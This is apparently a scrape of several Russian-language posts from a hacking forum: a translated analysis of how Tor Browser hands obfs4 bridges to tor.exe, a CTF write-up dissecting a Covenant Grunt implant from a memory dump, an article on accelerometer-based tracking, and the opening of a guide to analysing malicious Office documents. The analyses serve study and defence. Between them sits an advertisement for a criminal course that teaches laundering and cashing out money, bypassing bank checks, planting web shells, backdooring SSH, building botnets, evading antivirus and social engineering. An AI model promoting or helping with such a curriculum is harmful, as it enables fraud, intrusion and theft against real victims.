Это фрагмент данных команды "SETCONF", где "SETCONF" - это имя команды в начале структуры, за которым следует информация о встроенных мостах. Данные в красных линиях - это один блок Obfs4 Bridge, называемый линией конфигурации моста. Каждый узел моста должен быть сохранен в одной строке конфигурации моста. Всего таких линий конфигурации моста здесь 27. Как видите, тип моста "obfs4", а также IP-адрес моста и порт внутри него имеют строковый формат.

Информация о мосте также не запрограммирована жестко внутри процесса "tor.exe". Теперь мы сталкиваемся с другим вопросом: откуда берутся все данные SETCONF? Фактически, это полученный TCP-пакет от "firefox.exe", который является родительским процессом "tor.exe". После запуска tor.exe открывает порт управления TCP 9151 для получения команд от firefox.exe и порта прокси TCP 9150. Я объясню, как firefox.exe отправляет ему команды позже.

Продолжая анализ в "tor.exe", я заметил, что помимо команды "SETCONF", он также поддерживает другие команды, такие как "GETCONF", "SAVECONF", "GETINFO", "AUTHENTICATE", "SETEVENTS", "+LOADCONF", "QUIT" и так далее. "Tor.exe" имеет функцию для обработки этих команд и выполнения различных ветвей кода.

"Tor.exe" выполняет множество различных задач в соответствии с этими командами. Например: команда "SAVECONF" указывает "tor.exe" сохранить информацию о мосте в файл, расположенный в "Папка_установки Tor\Browser\TorBrowser\Tor\Data\torrc"; а "SETCONF" сообщает "tor.exe" информацию о мосте, которая затем передается процессам моста для установления мостовых соединений.

Поиск встроенных мостов Tor в Firefox.exe

Tor использует множество петлевых TCP-соединений для передачи команд между процессами для выполнения своих задач.

Wireshark начал поддерживать локальный адаптер обратной петли в версии 3.0.1, позволяя захватывать трафик на интерфейсе обратной петли, например пакет "SETCONF" от "firefox.exe" к "tor.exe" через порт управления TCP 9151 на локальном петлевом интерфейсе. RawCap - еще один инструмент, который может делать то же самое. "Firefox.exe" отправляет пакет команд в "tor.exe" особым образом: один байт - один пакет. Как вы можете видеть на рисунке 9, существует много пакетов длиной 1. Их повторное ассемблирование дает полную команду "SETCONF".

До версии 9.0 в Tor Browser было два расширения: Torbutton и TorLauncher. Они находятся в папке "Папка_установки Tor\Browser\TorBrowser\Data\Browser\profile.default\extensions". Соответствующие файлы расширения - torbutton@torproject.org.xpi и tor- launcher@torproject.org.xpi, как показано на рисунке 10, которые представляют собой Zip-архивы, содержащие файлы и модули JS.

Однако, начиная с версии 9.0 браузера Tor, эти два расширения были удалены. Вместо этого их код и функции были включены в браузер Tor. Обратитесь к Приложению для получения дополнительной информации.

Torbutton используется для установки и отображения настроек Tor, а также для отображения информации Tor, такой как "О Tor". Вы можете найти его, щелкнув значок Tor на панели инструментов браузера Tor (см. Рисунок 3).

TorLauncher отвечает за управление процессом Tor в соответствии с настройками, установленными через Torbutton.

TorLauncher загружается, и его JS-код выполняется в модуле "xul.dll" Firefox, который является основным компонентом Mozilla Firefox, а также реальным модулем, отправляющим команды "tor.exe", например «SETCONF» ( реализовано в network-setting.js), "GETCONF" (tl-protocol.js) и "GETINFO" (tl-protocol.js, torbutton.js). Модуль "xul.dll" представляет собой своего рода JS-движок для анализа и выполнения JS-кода этих команд.

Теперь давайте посмотрим на внутренний рабочий механизм Tor Browser с включенными мостами. После запуска Tor Browser с включенными мостами он выполняет следующие шаги:

- firefox.exe загружает основные профили, определение предпочтений и расширения [задействованные модули: firefox.exe, xul.dll]
- Расширение TorLauncher запускает tor.exe с настройками в командной строке [задействованный модуль: xul.dll)
- В любое время Вы можете изменить настройки Tor с помощью Torbutton [задействованный модуль: xul.dll]
- Он отправляет команды в "tor.exe" и сообщает ему, как работать, на основе настроек, предоставленных через локальные петлевые TCP-соединения [задействованные модули: xul.dll, tor.exe]
- tor.exe затем запускает один соответствующий процесс моста (obfs4proxy.exe для "obfs3" и "obfs4", fteproxy.exe для "fte" и terminateprocess-buffer.exe для "meek-azure") для установления мостовой связи [задействовано модули: tor.exe, мостовые процессы]
- tor.exe взаимодействует с этими мостовыми процессами через локальные петлевые TCP-соединения. [задействованный модуль: tor.exe, мостовые процессы]
- Процессы моста подключаются к релею моста [задействованный модуль: процессы моста]

Браузер Tor отправляет команды через локальный интерфейс обратной связи для управления работой клиента Tor. Затем он получает и анализирует результаты команд от клиента Tor.

Согласно моему анализу, вся информация о мосте "obfs4" определена в ряде именованных глобальных переменных, называемых настройками в Firefox, и хранится в локальном файле. Они инициализируются при запуске "ofirefox.exe", и к ним обращаются и используются в TorLauncher путем считывания настроек по их именам, производным от "oxul.dll".

В целях безопасности я скрыл имя файла, который содержит весь набор определений информации о мостах для всех типов мостов. В анализируемой мной версии браузера Tor она включает 27 мостов "obfs4", 4 моста "obfs3", 1 мост meek-azure и 4 моста "fte".

Подключаемый транспорт

В приведенном выше анализе мы упомянули типы мостов: "obfs4", "obfs3", "meek- azure" и "fte". Все они называются подключаемым транспортом (ПТ). Их основная задача - преобразовать трафик Tor и передать его между клиентом и его первым переходом (ретранслятор Tor). Таким образом, использование PT может затруднить идентификацию и блокировку трафика Tor с помощью цензуры.

Obfs4 - более сильный и популярный ПТ. Первый переход Obfs4 обычно представляет собой реле-мост, который не указан в главном каталоге Tor. Обфускатор Obfs4 был разработан и поддерживается Yawning Angel. Это проект с открытым исходным кодом, написанный на языке Go, к которому вы можете получить доступ на GitHub. Раньше у Obfs Bridges было несколько версий, таких как Obfs2 и Obfs3. Obfs4 не сильно на них похож, но ближе к ScrambleSuit, потому что концепция Obfs4 взята из протокола ScrambleSuit Филиппа Винтера. Вот почему клиентский процесс Obfs4 также может выступать в роли клиента ScrambleSuit.

Все возможности Obfs4 предоставляются программой "obfs4proxy.exe", которая является клиентским процессом Obfs4 для пользователей Tor.

Как мы уже знаем, браузер Tor построен на базе браузера Firefox и использует расширения Firefox для предоставления пользователям анонимного доступа в Интернет. После запуска браузера Tor он фактически запускает "firefox.exe", который загружает два расширения Tor (TorLauncher и Torbutton). Позже одно из расширений Tor запускает tor.exe, то есть клиентский процесс Tor. Когда браузер Tor настроен на включение моста Obfs4 в "Сетевых настройках Tor", "tor.exe" запустит "obfs4proxy.exe".

Как браузер Tor взаимодействует с клиентом Tor

Процессы firefox.exe (браузер Tor) и tor.exe (клиент Tor) взаимодействуют друг с другом через TCP-порт Tor, прослушивая интерфейс обратной связи (127.0.0.1).

Из рисунка 4 выше видно, что "firefox.exe" запускает "tor.exe". Чтобы быть более конкретным, "tor.exe" запускается расширением Firefox "TorLauncher", которое загружается и анализируется модулем "xul.dll"». Когда он вызывает собственный API Windows ShellExecuteExW() для запуска tor.exe, многие параметры командной строки передаются в tor.exe. На рисунке 11 показан снимок экрана с параметрами командной строки, переданными в "tor.exe", когда "firefox.exe" собирался запустить "tor.exe".

В "tor.exe" передается 10 параметров. Для наглядности я разделил их на таблицу ниже, по одному параметру в одной строке. В таблице 1 "… " - это сокращение от пути установки браузера Tor.

В таблице 1 выделено два порта: "+__ControlPort 9151" и "+__SocksPort» 127.0.0.1:9150 IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth". "Tor.exe" будет прослушивать эти два TCP-порта 9151 и 9150 интерфейса обратной связи (127.0.0.1), которые являются номерами портов по умолчанию, которые использует "tor.exe".

Пользователи могут изменять значения по умолчанию для двух портов, которые определены в нескольких локальных файлах. Вот пример кода в локальном файле.

// Proxy and proxy security
pref( "network.proxy.socks", "127.0.0.1");
pref( "network.proxy.socks_port", 9150);

TCP-порт 9151 - это порт управления, используемый для обмена управляющими командами и результатами между "firefox.exe" и "tor.exe". Tor предоставляет прокси-сервис SOCKS5 на TCP-порту 9150, который используется для передачи пакетов SOCKS5 между firefox.exe и tor.exe.

Ниже приведен пример управляющей команды. "Firefox.exe" отправил команду "GETINFO" в "tor.exe" через TCP-порт 9151 и запросил некоторую информацию, затем "tor.exe" проанализировал команду и отправил результат обратно в "firefox.exe" с TCP-порта 9151.

GETINFO status/bootstrap-phase
250-status/bootstrap-phase=NOTICE BOOTSTRAP PROGRESS=0 TAG=starting SUMMARY="Starting"
250 OK

Tor выполняет функции прокси на 127.0.0.1:9150, который передает обычные пакеты (незашифрованные Tor) между firefox.exe и tor.exe. На рисунке 12 показан снимок экрана с захватом пакетов в WireShark, где я разделил их на две части: верхняя часть - это рукопожатие Tor SOCKS5, нижняя - транспортировка пакетов.

На рисунке 12 показаны пакеты при посещении https://www.google.com в Tor Brower. В части установления связи "firefox.exe" сообщает "tor.exe", что адресатом доступа является "www.google.com" в пакете SOCKS5. После того, как рукопожатие SOCKS5 завершено, firefox.exe начинает посылать пакет приветствия клиента Google TLS в tor.exe, где этот пакет зашифровывается в клиенте Tor. Кроме того, клиент Tor отправляет обратно пакет Google TLS Server Hello. С этого момента firefox.exe начинает отправлять пакеты запросов и получать пакеты ответов от tor.exe через TCP-порт 9150.

На стороне клиента Tor он принимает пакеты через TCP-порт 9150 и завершает квитирование SOCKS5. Затем он получает обычные пакеты от "firefox.exe", которые затем шифруются. Пакеты, зашифрованные Tor, передаются входному релею Tor в выбранной цепочки Tor. Наконец, выходной релей Tor расшифровывает полученные пакеты, чтобы получить обычные пакеты, как показано между "firefox.exe" и "tor.exe", которые затем будут отправлены на целевой сервер (например, www.google.com).

В обратном направлении "tor.exe" получает зашифрованные пакеты от входного ретранслятора Tor, а затем расшифровывает их, чтобы получить пакеты с открытым текстом, которые в конечном итоге отправляются в "firefox.exe" из "tor.exe" через TCP-порт 9150, как показано ранее на рисунке 7.

Как клиент Tor взаимодействует с клиентом Obfs4

Клиент Tor ("tor.exe") запускает клиент Obfs4 "bfs4proxy.exe", как только клиент Tor получает команду "SETCONF" от браузера Tor. "Obfs4proxy.exe" открывает случайный TCP-порт на интерфейсе обратной связи для предоставления службы моста Obfs4 для Tor. Он уведомляет свой родительский процесс "tor.exe" о номере порта TCP через межпроцессный пайп.

На рисунке 13 приведен снимок экрана OllyDbg, показывающий, что точка останова в Windows API WriteFile() сработала, когда "obfs4proxy.exe" собирался сообщить "tor.exe" о своем TCP-порте. Как вы можете видеть в памяти, "CMETHOD obfs4 socks5 127.0.0.1:49496" - это данные с TCP-портом, отправляемые клиенту Tor.На этот раз случайный TCP-порт — 49496. Первый аргумент WriteFile() - дескриптор файла межпроцессного пайп, на этот раз 00000100.

После этого "tor.exe" может установить соединение с этим TCP-портом для связи с клиентом Obfs4. Tor отдельно отправляет узлы моста на этот порт, один мост за раз. На снимке экрана TCPView на рисунке 14 вы можете ясно видеть, что "tor.exe" отправляет мосты на "obfs4proxy.exe" отдельно.

Это весь процесс взаимодействия браузера Tor ("firefox.exe") с клиентом Obfs4 ("obfs4proxy.exe") через клиент Tor ("tor.exe"). В следующеq статье мы объясним, как клиент Obfs4 ("obfs4proxy.exe") устанавливает соединение с мостом Obfs4 и как Obfs4 преобразует пакеты для обхода цензуры.

Браузер Tor версии 9.0

В конце октября 2019 года был выпущен браузер Tor версии 9.0, в котором были удалены два расширения (TorLauncher и Torbutton). Без них браузер Tor теперь выполняет задачи, которые эти два расширения выполняли ранее. Фактически, в ходе своего анализа я обнаружил, что новая версия не удаляла код двух расширений, а вместо этого интегрировала их код в файл Firefox JAR под названием "omin.ja". Этот файл загружается и анализируется Firefox при запуске. После этого вы можете найти настройки сети Tor, используя меню “Options”-> “Tor”, как показано на Рисунке 15 ниже.

Это изменение в новой версии не влияет на рабочий механизм Tor Browser, поэтому этот анализ все еще действителен, даже если он был основан на старой версии 8.0.

Переведено специально для XSS.IS
Автор перевода: yashechka
Источник: <https://www.fortinet.com/blog/threat-research/dissecting-tor- bridges-pluggable-transport>

Испытание по криминалистической экспертизе дампа .NET

ID: 676533bbb4103b69df371b65
Thread ID: 60709
Created: 2021-12-30T21:12:25+0000
Last Post: 2022-01-02T00:42:22+0000
Author: tabac
Prefix: Статья
Replies: 1 Views: 2K

Это испытание с MetaCTF CyberGames 2021, в рамках которого нужно было выполнить криминалистическую экспертизу дампа памяти .NET. Проведение такой экспертизы может быть многим незнакомо, так что, надеюсь, данная статься окажется полезной.

Вход в NET

В качестве торжественного финала пришло время объединить все ваши навыки криминалистической экспертизы. Вам предстоит немного поработать с Криптографией и Реверс-инжинирингом, а также с большим объемом Анализа.

В этой задаче сбор перехваченных пакетов и дампа процесса предлагаемого вам для рассмотрения маячка мы взяли на себя.

С целью предоставления нашему руководству необходимой ясности, мы хотим знать конкретно, какие действия атакующие предпринимали на этой особо ценной машине (имейте ввиду – здесь дамп/перехваченные пакеты отличаются от всех предыдущих задач). Поэтому, чтобы воссоздать картину произошедшего, вам потребуется сопоставить информацию в перехваченных пакетах и извлечь необходимые критические данные из дампа памяти.

Решение

Анализ пакетов

Для начала рассмотрим перехват пакетов с помощью wireshark , чтобы понять, с чем мы имеем дело.

Здесь я сходу замечаю два интересующих нас пакета:

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fb9%2Fmp%2Fal%2Fb9mpal8rddyc- nvtaqdlq3r5e94.png&hash=c24461601da7f79a9bbf68d906be4bb2)

GET /en-us/docs.html вызывает интерес, потому что сразу же следом мы наблюдаем отправку большого объема данных. При этом я не придаю значения GET /latest/meta-data/instance-action, так как это что-то о сервере EC2 AWS, который по случайности был оставлен.

Чтобы увидеть, как рассматриваемые пакеты задействованы во всем сеансе, используем follow http stream.

Сразу же выделяется одна деталь: весь сеанс составляет 630Кб. Похоже, что здесь была передана программа. Я постарался найти среди огромных блоков текста какие-нибудь полезные данные, но они, скорее всего, зашифрованы.

Здесь немного полезной информации, просто перехваченные пакеты, показывающие скачивание чего-то зашифрованного.

Анализ дампа

Это файла дампа Windows, поэтому мы его проанализируем с помощью WinDbg.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fm5%2Fyx%2Fs6%2Fm5yxs6_nn- fmgz4sbpbnrmomces.png&hash=5dcc49f3ea684b211e1c7564a6fc5dc1)

Для анализа программы .NET сначала нужно установить netext.

Code:Copy to clipboard

0:000> .load netext

Дамп кода

Сначала нам необходимо проверить выполняющийся код. Для этого потребуется сделать его дамп.

Code:Copy to clipboard

0:000> !wmodule -managed -saveto C:\Users\IEUser\Downloads\net\dump Saved 'C:\Users\IEUser\Downloads\net\dump\Grunt.exe' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\System.Windows.Forms.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\System.Drawing.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\System.Xml.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\System.Configuration.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\System.Core.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\System.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\mscorlib.ni.dll' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\ta2521lw.nbq, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\if3vizgz.gue, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\EILxxsbDHTbdXhkqQNppeCxDtWdOB, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\q2foozwn.pi1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' successfully Saved 'C:\Users\IEUser\Downloads\net\dump\OUZWwjnRdRpuqIqXtbtAdEDpAmRDA, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' successfully

Как всегда при работе с программами .NET скачиваем не системные файлы в dnSpy.

EILxxsbDHTbdXhkqQNppeCxDtWdOB.dll
Это просто пустая dll.

kxwieowc.bru.exe
У этого исполняемого файла есть точка входа в GruntStager.GruntStager.Main. Через Google выясняем, что это, скорее всего, Covenant Grunt – развертываемый на целях имплант.

Похоже, что он проделывает немало работы для скачивания сборки и ее загрузки с помощью Assembly.Load(aes2.CreateDecryptor()....

if3vizgz.gue.dll
Здесь находится библиотека SharpSploit, используемая для выполнения кода Powershell.

OUZWwjnRdRpuqIqXtbtAdEDpAmRDA.dll
Просто пустая dll.

q2foozwn.pi1.dll
А вот эта dll содержит интересный атрибут:

Code:Copy to clipboard

[module: ConfusedBy("Confuser.Core 1.1.0-alpha1.52+gfe12a44191")]

Получается, этот исполняемый файл защищен ConfuserEx , поддержка которого была прекращена. Раз он под защитой, то добраться до него можно через дамп памяти.

Code:Copy to clipboard

public static class Task { // Token: 0x06000035 RID: 53 RVA: 0x000033CC File Offset: 0x000015CC public static string Execute() { string result; try { int left = SystemInformation.VirtualScreen.Left; int top = SystemInformation.VirtualScreen.Top; int width = SystemInformation.VirtualScreen.Width; int height = SystemInformation.VirtualScreen.Height; using (Bitmap bitmap = new Bitmap(width, height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(left, top, 0, 0, bitmap.Size); } MemoryStream memoryStream = new MemoryStream(); bitmap.Save(memoryStream, ImageFormat.Png); result = Convert.ToBase64String(memoryStream.ToArray());

Не удивительно, что эта часть была защищена. Похоже, здесь у нас задача для Grunt – сделать скриншот и вернуть его. Посмотрим, удастся ли найти этот скриншот в dmp.

ta2521lw.nbq.dll
Это основной GruntExecutor, который только взаимодействует с другими Grunt'ами, сам при этом ничего интересного не делая.

Анализ памяти

Часть 1/2
Мы знаем, что флаги представлены, как минимум, в формате *_*_*. Почему бы тогда не проверить, не находится ли он уже в памяти.

Для начала выполним:

Code:Copy to clipboard

0:000> !windex

В результате netext сможет проиндексировать все объекты в памяти, готовые для наших запросов, после чего можно будет начать поиск возможного флага.

Code:Copy to clipboard

0:000> !wfrom -type System.String where ( $wildcardmatch($string(), "*_*_*") ) select $addr(), $string() ... calculated: cmd.exe /c echo "part 1/2: when_you_see_sharp_"

Здесь было много ложных результатов, но я думаю, что это его первая часть.

Часть 2/2
До этого мы видели задачу по снятию скриншота, который, готов поспорить, и был флагом. Вопрос лишь в том, как получить изображение?

Оно находится в System.Drawing.Bitmap, значит стоит поискать его в памяти.

Code:Copy to clipboard

0:000> !windex -type System.Drawing.Bitmap Index is up to date If you believe it is not, use !windex -flush to force reindex Address MT Size Heap Gen Type Name 0000000002620fd8 00007ffd6140bed8 48 0 0 System.Drawing.Bitmap 1 Objects listed

Мы видим, что в памяти находится всего один точечный рисунок, который, скорее всего, и является искомым скриншотом.

Code:Copy to clipboard

0:000> !wdo 0000000002620fd8 Address: 0000000002620fd8 Method Table/Token: 00007ffd6140bed8/200000e04 Class Name: System.Drawing.Bitmap Size : 48 EEClass: 00007ffd61412fd0 Instance Fields: 4 Static Fields: 1 Total Fields: 5 Heap/Generation: 0/0 Module: 00007ffd61400000 Assembly: 0000000000a0d3a0 Domain: 0000000000947110 Assembly Name: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll Inherits: System.Drawing.Image System.MarshalByRefObject System.Object (00007FFD6140B798 00007FFD6AC3AB68 00007FFD6AC35DD8) 00007ffd6ac35dd8 System.Object +0000 __identity 0000000000000000 00007ffd6ac3aaa0 System.Byte[] +0008 rawData 0000000000000000 00007ffd6ac35dd8 System.Object +0010 userData 0000000000000000 00007ffd6acb31f8 System.IntPtr +0018 nativeImage 0 (0n0) 00007ffd6140ac20 Static System.Drawing.Color +0050 defaultTransparentColor -mt 00007FFD6140AC20 000000001243B188

Тем не менее, если посмотреть дамп этого изображения, то нам не удастся найти способ получить фактические данные.

Попробуем отыскать этот рисунок в памяти с помощью классического инструмента, binwalk.

Code:Copy to clipboard

$ binwalk --dd='.*' step_into_the_net.dmp

Здесь у нас несколько изображений, покопавшись в которых я нашел 83AABA, который содержит вторую часть флага.

Решено

Совмещая эти две строки, получаем решение:

Code:Copy to clipboard

when_you_see_sharp_those_hackers_dont_stand_a_chance

Когда ты наблюдателен, у хакеров не остается шансов

Заключение

Это был весьма интересный вызов по криминалистической экспертизе. Дамп Windows мне еще анализировать не доводилось, так что пришлось знакомиться с несколькими новыми инструментами. Большое спасибо MetaCTF за предоставление такого испытания.

[Автор оригинала: Brian Stadnicki](https://brianstadnicki.github.io/posts/ctf- metactf-cybergames-2021-step-into-net/)
перевод Дмитрий Брайт @Bright_Translate

[PLASTIK] Университет Кибербезопасности и Анонимности 2.0 (2020)

ID: 676533bbb4103b69df371b67
Thread ID: 40037
Created: 2020-07-26T11:46:55+0000
Last Post: 2021-12-30T16:48:34+0000
Author: R3SET
Replies: 7 Views: 2K

**Онлайн-Платформа от Гуру Darknet’a, в которой ты научишься:

Безопасность:**

Настраивать анонимную и безопасную систему

Обналичивать грязные и серые денежные поступления

Обходить банковские проверки

Скрывать подмену fingerprint и IP

Настраивать безопасность системы виртуализации

Шифровать трафик и защищаться от перехвата

Перехватывать трафик в TOR

Владение нашими персональными софтами

Обрести знания по векторам атак и мерами их предотвращения

Создавать изолированную сеть без любых утечек трафика
и многое другое

Хакинг:

Искать уязвимости методом фаззиннга

Вытягивать Базы Данных и монетизировать данные

Владеть Linux

Массовый сбор серверов

Лить шеллы эксплуатируя Remote File Include

Получать доступы к серверам

Автоматизировать работу

Поднимать свой DNS и лить на него трафик

Поймешь, что данные - самое дорогое в мире и будешь их монетизировать

Работать по трафику

Вирусология:

Настраивать и использовать вирусы

Превращать загрузки в деньги

Разбираться в вирусах

Обходить антивирусы

Создавать и контролировать ботнет

Управлять машиной после заражения

Зачищать следы после атаки

Соц. инженерия:

Находить подходы к людям

Понимать паттерны поведения

Входить в доверие

Манипулировать поведением

Зарабатывать на хайпах

Составлять планы атаки

Избегать основных ошибки

Тебя манит на темную сторону, но ты не знаешь с чего начать

Ты хочешь класть крупные котлеты в свой карман используя свой мозг

Ты хочешь овладеть самыми прибыльными направлениями

Ты не хомячок верящий в светлое будущее работая на дядю

Ты хочешь перестать смотреть на цены в меню Мишленовского ресторана

Ты понимаешь, что реально большой куш зарабатывается интеллектом

Тебя тошнит от слов "кредит" и "ипотека" и поставил цель купить все желаемое за реальный кэш

Ты прочитал все эти пункты и готов ебашить

Security / Безопасность

Настройка полностью анонимной и безопасной системы

Обход слежки провайдером

Шифрование диска на уровне системы

Создание криптоконтейнеров и безопасное хранение данных вне системы

Подмена уникальных параметров системы и браузера для обхода fingerprint

Шифрование трафика и запутывание его источника

Ввод и вывод валюты в даркнете

Отбеливание криптовалюты

Противодействие утечке реальных данных

Поддержание сессии для обхода банковских проверок

Настройка анонимных виртуальных машин

Защита от проникновения в основную систему

Перехват трафика в системе и на сервере

Защита от атак нулевого дня

Связки для безопасного и анонимного доступа в интернет

Double VPN и его работа в связке с тором

Защита от падения VPN и утечек из-за сетевых сбоев

Работа через удалённую систему windows

Софт для конфигурации и очистки системы

Отключение подозрительных функций в windows

Обход утечек через мета-информацию у файлов

Защита от DNS leak

Противодействие вычислению через анализ логов

Использование левых карт и симок

Схемы отмывания и обналичивания валюты

Hacking / Хакинг

Основы Linux

Основы web

Поиск уязвимостей методом фаззинга

Вытягивание БД через эксплуатацию SQL-injection

Пробиваемся на сервак или эксплуатация Local File Include

Льем шеллы через эксплуатацию Remote File Include

Что такое Remote Code Execution и с чем его едят

Изучение инструментария или "секрет моего успеха - автоматизация"

"Из грязи в князи" поднимаем привелегии на серваке используя эксплоиты для Privilege Escalation

Обходим фильтрацию форм загрузки файлов для прогрузки веб шеллов

Брутим SSH и скрываем свое присутствие

Увеличиваем срок жизни SSH доступов или что такое SSH ключи

Секреты вечной жизни
Бекдорим OpenSSH на Linux серверах

Массовый сбор серверов

Поднимаем свой DNS и льем на него трафик

Работа по трафику

Эксплуатация уязвимостей и методы атаки

Монетизация всех типов данных

Malware / Вирусология

Приватный вирус университета для лёгкого старта

Настройка и использование вирyсов

Работа с популярными фреймворками

Создание и контроль ботнета

Создание своего первого ботнета

Первичная оценка системы

Анализ большого потока данных

Обход антивирусов

Автоматизация атак при массовом распространении

Безопасное подключение к заражённой машине

Использование сторонних инструментов

Как не потерять ботнет после блокировки серверa

Заметание следов после отработки жертвы

Social / Социальная Инженерия

СИ для распространения вирусов

Паттерны поведения

Ошибки и правильная стратегия в общении

Создание убедительных аргументов

Выбор тем и направлений работы

Креативный подход

Работа по хайп-направлениям

Сбор информации для действий

Разбор типичных ошибок

Использование интересов для привлечения внимания

Поиск предлогов для внедрения

Заметание следов после отработки
Продажник
Plastikcash
Скачать
Скачать

Откуда сайт знает, что ты сидишь в уборной?

ID: 676533bbb4103b69df371b6b
Thread ID: 60543
Created: 2021-12-27T17:55:41+0000
Last Post: 2021-12-27T17:55:41+0000
Author: pablo
Prefix: Статья
Replies: 0 Views: 2K

Многие не представляют, какой объём данных можно снимать с акселерометра в смартфоне. Думаете, информация используется только для поворота экрана? Далеко не так. На самом деле паттерны движения смартфона и его положение в пространстве многое говорят о действиях пользователя: он сидит, лежит, стоит, бежит… Можно распознать личность человека по голосу из динамика, записав реверберации корпуса смартфона через акселерометр. Определить, кто находится рядом в автобусе или автомобиле (с такими же паттернами движения).

Некоторые приложения постоянно снимают эти данные без разрешения пользователя (в Android и iOS 15 разрешение не требуется). Не только приложения, но и веб-сайты.

Слежка с помощью акселерометра

Акселерометр и гироскоп — это простая микросхема типа [Invensense MPU-6500](https://invensense.tdk.com/products/motion- tracking/6-axis/mpu-6500/) с датчиками движения по шести осям (по три для гироскопа и акселерометра).

Расположение акселерометра и динамика в смартфонах разных производителей

Обычное применение — определение ориентации экрана. Есть и другие варианты использования. Например, управление автомобилем в гоночных симуляторах с помощью наклона, [подсчёт количества шагов](https://github.com/topics/step- counter), определение падения пользователя (как делает Apple Watch), определение положение пользователя в пространстве.

То есть любое приложение и любой сайт могут подсчитать, сколько шагов прошёл человек и чем он занимается в данный момент. Вероятно, по специфическому положению телефона в пространстве и характерным движениям [можно даже определить, что человек сидит в туалете](https://incolumitas.com/2021/02/05/why-does-this-website-know-i-am- sitting-on-the-toilet/).

Сейчас ведутся научные исследования для использования акселерометра в некоторых новых областях, например, измерение пульса, частоты дыхания. Есть попытки звукозаписи речи из динамиков по данным акселерометра.

Звук — это распространение механических колебаний в веществе. Реверберация — процесс постепенного уменьшения интенсивности звука при его многократных отражениях.

Реверберации речи из динамиков распространяются по корпусу и воздействуют на датчики движения, изнаучной работы

Конечно, отдельные слова разобрать не получится, но можно определить пол говорящего (точность более 90%) и выполнить идентификацию личности по маленькой базе голосовых отпечатков.

Точность определения пола и личности (база 10 человек) на смартфоне в руке

Нужно ещё раз подчеркнуть, что акселерометр внутри аппарата не реагирует на воздушные реверберации речи, то есть нельзя прослушивать людей рядом со смартфоном. Только тех, чья речь доносится из динамика.

На данный момент iOS и Android не требуют специальных разрешений на доступ приложений к данным акселерометра. То есть приватные данные может легко снимать любое приложение.

Click to expand...

Например, Facebook всегда снимает эти данные через свои приложения, в том числе Instagram, Whatsapp и др.

Лог сообщений со смартфона на сервер Facebook с данными акселерометра, если открыть приложение Facebook,источник

Доступ через браузер

Скрипт для считывания данные акселерометра [присутствует на многих популярных сайтах](https://www.wired.com/story/mobile-websites-can-tap-into-your-phones- sensors-without-asking/).

Образец скрипта
[hide=javascript][/hide]

Тут ситуация отличается на разных платформах.

Все браузеры под iOS обязательно используют WebKit, так что если сайт попытается запустить такой скрипт, обязательно выскочит диалог с запросом разрешения. Независимо от используемого браузера, будь то Safari, Firefox или Chrome.

А вот смартфоны под Android по умолчанию предоставляют сайтам доступ к событиям [deviceorientation](https://developer.mozilla.org/en- US/docs/Web/API/Window/deviceorientation_event) и [devicemotion](https://developer.mozilla.org/en- US/docs/Web/API/Window/devicemotion_event) с информацией от датчиков движения.

Если зайти на данную [демо-страницу](https://whatwebcando.today/device- motion.html) со смартфона под Android, то вы можете увидеть эти данные.

![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fwm%2Fra%2Fpk%2Fwmrapkngxn- ljlnxfbyaxvm2emk.png&hash=f31dcdf68e822fb38d8f51b82a58797c)
Некоторые события можно симулировать в Chrome Dev Tools на десктопе (3D-модель вращается по всем осям мышкой).
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fnr%2Fmj%2Fpc%2Fnrmjpc- ivnh6wplbkxvwfny5fi8.png&hash=31682d6671cfe917fe7cba52ca7e8e11)

Векторы атаки

Есть разные варианты эксплуатации. Например, веб-сайт или приложение может определять группы пользователей, которые находятся рядом с друг другом, в одном автобусе, одном поезде или автомобиле. У них будут синхронные данные о вибрации с датчиков движения. Таким образом можно отслеживать координаты пользователя, у которого отключена геолокация.

habr.com

Уроки форензики. Исследуем вредоносные документы Microsoft Office

ID: 676533bbb4103b69df371b71
Thread ID: 60151
Created: 2021-12-16T20:28:16+0000
Last Post: 2021-12-16T20:28:16+0000
Author: pablo
Prefix: Статья
Replies: 0 Views: 2K

Один из самых распространенных векторов атак на организации и простых пользователей — социальная инженерия. Злодеи присылают жертве электронное письмо с вложением, очень часто — документ Microsoft Office с опасным содержимым. В этой статье мы разберемся, как анализировать такие документы и как искать в их недрах вредоносный код.

Согласно матрице MITRE ATT&CK, атака, в которой злоумышленники используют документы Microsoft Office, называется Spearphising Attachment. Чтобы рассказать о методах анализа применяемых в таких атаках файлов, я воспользуюсь двумя заданиями с ресурса CyberDefenders. Первое из них — Obfuscated — позволит нам исследовать вредоносный документ в формате DOC. С помощью второго, под названием Emprisa Maldoc, мы разберем, как злоумышленники используют документ RTF для выполнения шелл‑кода.

Существуют следующие методы выполнения вредоносного кода в документах Microsoft Office.

Выполнение кода, встроенного в макрос VBA.

Выполнение JavaScript в документах Microsoft Office.

Выполнение полезной нагрузки с использованием уязвимостей в приложениях Microsoft Office.

Для нашей работы мы будем использовать следующий набор утилит:

oleid — для анализа OLE-файлов;

